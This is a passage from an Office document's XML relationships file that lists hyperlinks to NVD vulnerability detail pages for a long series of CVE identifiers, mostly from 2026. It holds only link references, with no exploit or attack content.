Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87464" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87470" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87474" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87488" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87492" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87494" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87500" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87504" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87512" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87520" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87526" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87527" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87528" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87529" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87547" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87558" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87581" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87607" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87609" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87621" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87634" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87637" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87638" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87643" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87646" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87650" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87654" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44950" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65639" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66066" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70470" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70477" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85216" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88062" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70141" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11841" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16242" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39975" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41242" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43114" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45272" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48088" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50561" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52777" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57580" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61410" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6223" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62668" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63221" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67305" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67330" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67336" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6881" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69254" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69256" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69259" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69264" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72841" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72842" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72879" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73653" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75925" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81046" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82533" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84200" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86123" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86148" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86149" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86151" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86153" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88285" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54356" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54391" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58376" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14813" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-31114" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71401" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15378" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16876" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19264" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21102" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25896" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41452" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44402" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44990" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45118" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4599" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47156" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47187" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47754" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48046" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48063" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48158" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48159" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48160" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48996" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51106" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52735" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53578" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53579" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53670" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53671" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55068" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55220" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55378" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56705" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57910" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61514" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61515" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61516" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62645" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62647" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62681" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62682" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62928" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63106" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64827" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65641" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66747" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66794" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67308" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67531" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67614" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68582" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68770" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68771" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68929" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69356" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69657" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70403" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71864" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71865" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71866" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71867" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71868" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71869" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71871" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71960" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72716" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72717" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72839" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73080" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73090" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73251" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73532" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73533" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73665" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75827" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75828" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75832" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75835" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75837" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75854" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75940" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76200" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76201" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77089" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77413" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77414" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77415" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77642" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77644" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77776" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78012" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78082" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78997" TargetMode="External" Id="rId496" /><Relationship 